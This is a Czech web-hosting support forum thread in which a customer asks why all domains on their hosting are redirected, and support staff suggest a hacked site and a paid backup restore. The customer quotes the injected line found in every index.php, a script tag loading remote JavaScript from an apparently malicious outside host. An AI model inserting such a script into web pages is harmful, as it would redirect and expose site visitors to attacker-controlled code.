Všechny domény na hostingu přesměrovány

Vyřešeno814 zhlédnutíDomény
0

Dobrý den,

dnes jsem si všiml, že veškeré domény pod mým webhostingem jsou přesměrovány zásahem třetí strany. Chtěl bych se zeptat, jestli je chyba na mé či Vaší straně a případně kde může být problém. A jak nejlépe toto vyřešit a postarat se o to, aby se to již neopakovalo. Mockrát děkuji za odpověď a případnou asistenci.

S pozdravem,

Špaček

Role: Zákazník
Otázka je uzamčena pro nové odpovědi.
Vybral nejlepší odpověď
0
21.83K - WEDOS Internet, a.s. 0 Comments

Dobrý den,

to bohužel na klasickém webhostingu nelze. Toto je možné pouze u WMS, kdy si nevytváříte multihosting ale pro každý web si vytvoříte vlastní webhosting -> https://www.wedos.cz/wms

Role: Podpora Vizitka: Roses are Red, Violets are Blue Unexpected '{' on line 32.
Vybral nejlepší odpověď
0
24.31K - WEDOS Internet, a.s. 0 Comments

Dobrý den,

To vypadá jako napadený / hacknutý web. Pokud máte zálohu webu z doby, kdy fungoval, doporučuji provést obnovu. Případně proskenujte soubory webu vaším antivirovým programem nebo kontaktujte někoho, kdo se zabývá odvirováním webů.

Pokud jde o nějaký redakční systém, zkontrolujte, zda se nezměnila nastavená URL adresa webu. Může to způsobovat nějaký plugin, pokud byl v nedávné době nějaký plugin nově aktivovaný, zkuste jej vypnout.

Role: Podpora
Odpověděl na otázku
0

Stejné přesměrování se týká všech domén pod tímto účtem. Tedy by to vypadalo na hacknutý FTP účet? Něco jede na WordPressu ale něco ne, přitom chyba stejný. Na plug-in bych to tedy neviděl. Zálohy webů v nynější podobě nemám. Předpokládal jsem, že pro tyto případy běží nějaký zálohovací systém na Vaší straně a je možné rollback na „relativně nedávnou“ verzi webu? Možnost otestovat hosting antivirem jsem nikde na webu nenašel.

Role: Zákazník
Změnil status na publikováno
0
24.31K - WEDOS Internet, a.s. 0 Comments

Dobrý den,

z naší strany je obnova ze zálohy možná.  Avšak je možné, že již záloha obsahuje napadený web.

Obnova ze zálohy u webhostingu NoLimit a služeb VPS je zpoplatněna částkou 500 CZK bez DPH, u NoLimit EXTRA je obnova zdarma.

Pokud souhlasíte s cenou sdělte nám následující informace skrze kontaktní formulář (https://hosting.wedos.com/cs/cform.html):
1) Název služby:
2) Záloha FTP, DB (název), oboje:
3) Z jakého dne zálohu požadujete (přesný datum zálohy upřesní technik):

4) Způsob obnovy (a/b):

a) Přepsat všechny současné data na FTP daty ze zálohy (export databáze bude umístěn na FTP)
b) Nahrát data ze zálohy do samostatné složky na FTP

Role: Podpora
Odpověděl na otázku
0

Dle datumů úprav souborů na FTP jsou to index.php. Opravím si je, ale chtěl bych se zeptat jestli máte nějakou možnost zjistit jak k útoku došlo, či jak mu v budoucnu zabránit. Změním heslo všech FTP účtů, ale pokud máte jiné tipy k tomu rád si je přečtu. Děkuji.

Role: Zákazník
publikoval nový komentář

Zmeňte si heslo na ftp, ktoré nikde inde nepoužívate a aktualizujte si všetky pluginy. Nainštalujte si nejaký bezpečnostný plugin pre WP napr. wordfence alebo iThemes Security…ale len jeden

0

Tak jsem zkusil udělat čistou instalaci WP. Původně to vypadalo, že všechny index.php byly napadeny s vložením „<script type=’text/javascript‘ src=’https://stat.trackstatisticsss.com/k.js?v=222′></script>“. Na tento web je vše přesměrováno. Bohužel po odstranění scriptu se nedaří problém odstranit. Po čisté instalaci WP základní stránka funguje, avšak po zadání www.doména.cz/wp-admin se opět přesměruje (mělo by to přeci tahat vše z nové instalaci a především svého složky v /domains.

Role: Zákazník
Změnil status na publikováno
0

Dalsi poznatek je, ze cely redirect zpusobuje nejaky javascript (kdyz ho vypnu v prohliceci, vse vali). Nejaky zpusob jak relativne jednoduse odkrokovat nacitani aby se ukazalo kde a jaky javascript redirect zpusobi? Dekuju za rady.

Role: Zákazník
Změnil status na publikováno

Kategorie